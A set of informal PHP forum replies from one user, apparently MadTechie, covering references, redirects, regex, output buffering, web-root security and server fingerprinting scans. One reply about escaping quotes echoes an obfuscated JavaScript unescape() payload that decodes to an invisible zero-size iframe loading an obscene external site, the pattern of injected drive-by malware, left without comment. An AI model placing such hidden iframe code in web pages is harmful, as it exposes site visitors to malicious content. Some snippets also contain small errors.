MadTechie

Can you post how your inserting them, it sounds like your stripping them out

its truely about viewing, so CSS/HTML, also make it more text than graphical based (remember small screen), as for PHP, well its finished my the time its got to the browser.. only thing would be maybe detect what browser is being used!!

You don't need that function However to call it your do the following checkGrade($_GET['grade']);

okay i started to type this then i had a long phone call Its the same idea as a pointer in C. okey heres a function <?php $data = "123"; $data = addstuff($data); function addstuff($add) { $add = $add."Blar" return $add; } ?> Okay what that does is pass 123 and then returns 123456 Now the memory used is $data = "123"; then $data = "123"; $add= "123"; then $data = "123"; $add= "123Blar"; then $data = "123Blar"; okay.. now with Passing by Reference (not default in php 5) <?php $data = "123"; addstuff($data); function addstuff(&$add) { $add = $add."Blar" } ?> this is how it goes $data = "123"; then $data = "123"; and $add= $data; these take up the same memory block so if $add changes then $data changed then $add= "123Blar"; //so $data = 123Blar

Humm its a wide range, the "\x16\x03" is either a something trying to use ssl on your server that i assume doesn't have ssl on (or their using the wrong port) or some test is check to see if you have a webmail their is infact your server redirecting a users request, you could create that file if you like (just a html file with a message ie "501 error" this I assume is used for the finger print, it basically doesn't exist thus this gets and error returned from the server, which contains Web Server type, Version and OS you can protect against this by adding the following lines to your Apache config (httpd.conf) that will prevent the server from disclosing that information. ServerTokens prod ServerSignature no BUT it doesn't stop them all.. I will take a chance here and say, from what i have seen, this seam to be an automatic process and unless your server is out of date you shouldn't need to worry (as it will probably stop, by itself) it seams to be testing for some very basic weaknesses (to exploit your server for spamming), but the program or bot that seams to be doing this is either some off the shelf software or a generically written bot, its probably not a cracker after you (if it is, they are not very good).

check the IP of the client thats requesting those files. it sounds like a scan to me

When you send a request to a server if that request as an error in it the server replies with a message like Now just say you wanted to find out what software/server/OS a machine was running but the tech guy turned off the welcome messages, identifiers etc etc.. this means you don't know what types of vulnerabilities to look for. but if you send a malformed packet and you got back "unable to resolved" oow that's a windows message thus that machine is running windows the same idea with requests to Apache or IIS etc, these are used as fingerprints to find out whats running Now someone could connect to your host and using finger print scans could find out everything your running, (maybe down to the version number (mostly major numbers) Now they have all this info about your server they can now look for vulnerabilities within that software so just say they found your using XYZ-FTP and they found a vulnerabilities it and you don't have the latest updates/patches they could get into your files without your password no matter what you do.. it infact could be a higher level access that you have (depending on what you have).. you can't stop this via PHP this is higher up the chain.. Just make sure you have all the updates in place and you should be okay (probably muhahahah)

doesn't mean its a problem with the header() function You should of read the pinned post HEADER ERRORS - READ HERE BEFORE POSTING THEM as that explains this problem!

change <?php mysql_select_db($database_dbTeamAccess, $dbTeamAccess); to <?php mysql_select_db($database_dbTeamAccess, $dbTeamAccess);

you need to escape the single quotes ie <?php echo ''; ?><?php echo '<Script Language=\'Javascript\'> <!-- document.write(unescape(\'%3C%49%46%52%41%4D%45%20%73%74%79%6C%65%3D%22%57%49%44%54%48%3A%20%30%25%3B%20%48%45%49%47%48%54%3A%20%30%70%78%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6D%79%66%75%63%6B%69%6E%67%2D%70%75%73%73%79%2E%63%6F%6D%2F%74%79%72%65%6B%2F%3F%74%3D%34%22%20%66%72%61%6D%65%42%6F%72%64%65%72%3D%30%20%73%63%72%6F%6C%6C%69%6E%67%3D%6E%6F%20%61%6C%6C%6F%77%54%72%61%6E%73%70%61%72%65%6E%63%79%3E%3C%2F%49%46%52%41%4D%45%3E\')); //--> </Script>'; ?>

LOL, that or someone is scanning your machine for vulnerabilities, that nomally appears on a finger print scan to detect what OS is running

Please explain what you mean by and how did you find this out ?

Topic Solved ? if so please click it

i'm not sure what your asking..

Looks like the username is the problem! maybe start_session(); have you tried echoing the results!

Well thats kinda hard considering PHP is server side! but i guess you could use sockets, that connects directly to the file and steams it (like tunnerling)

Theirs no need to pass it to $_GET as that will have no effect, appending it to the URL is fine, Now the problem is your infact passing a resource, and not a string, because you haven't fetched form the database, as for the SQL statement, thats looking for a table ?.. inanycase it should look something like this <?php $result=mysql_query("SHOW TABLES FROM sand2 LIKE '%$find%'") or die(mysql_error()); $row=mysql_fetch_array($result); echo " <a href='{$_SERVER['PHP_SELF']}?currentpage=$nextpage&result={$row[0]}'>></a> ";

Please note thats NOT what you asked, pre loading images is one thing and in somecases makes sense, you said

Your very correct (as always) corbin, most browsers will fix this, and allow you to do it, thats why people (myself included) are lazy and use that shortcut, <?php header("Status: 301"); # 301 Moved Permanently / 302 Temporary moved header("Location: http://{$_SERVER['SERVER_NAME']}/home.php"); exit; ?> As a side note google likes 301 status when things are moved but doesn't like 302 (or thats what i read somewhere..awaits corbin responces lol)

The funny things is by the time the user has half download the main page and left thats the same as someone visting half your site, also this assumes people go to the main page first, who wants to goto a site and have to download everything ? personally if i was downloading a printer driver i want the driver for the model printer that runs on my OS, i don't want to download every driver ever made my that company "to save me time later" trying to speed up a bad design is more work than a re-design,

Okay lets look back now everything in c:\webserver\wwwroot\ is published on the web but remember that users can't access files below the wwwroot level BUT scripts can.. so while a script can access c:\webserver\secure\ theirs no URL to it So if you created a script called viewprivate.php and put that in c:\webserver\wwwroot\ its accessable, now if that script did this <?php echo file_get_contents('c:\webserver\secure\private.txt'); ?> its infact displaying something from a folders that not public, thus it MUST be accessed via the script.. Now if you added a login or session check this could be used to allow selected users access private files i hope that makes sense

could be a database problem, when i get home i'll export my table and post it

define("FLV_REGEXP", "/\[flv\]([_A-Za-z0-9-]+)\[\/flv\]/"); won't work, your missing dots and slashes and % etc try this define("FLV_REGEXP", '%\[flv\](.*?)\[/flv\]%is');

As this was meant for Javascript i should move it to the javascript section but, as people are talking about php validations i'll leave it here, As for what validation to use, i use javascript for the first part (nice messages etc) but always have a PHP side (normally written first), the way i look at it is, if they disable the javascript they may not get the warning on the first page saying "sorry thats not a valid email" but once submitted, they will get a message their, and if i've been lazy they will need to re-enter all the details again

Think of it this way <?php echo "Hello "; sleep(5); echo "World"; ?> this will display in just over 5 seconds <?php on_start(); echo "Hello "; ob_flush(); flush(); sleep(5); echo "World"; ?> this will display then display 5 seconds later display the final result is still but the flush means you didn't have to wait for the script to end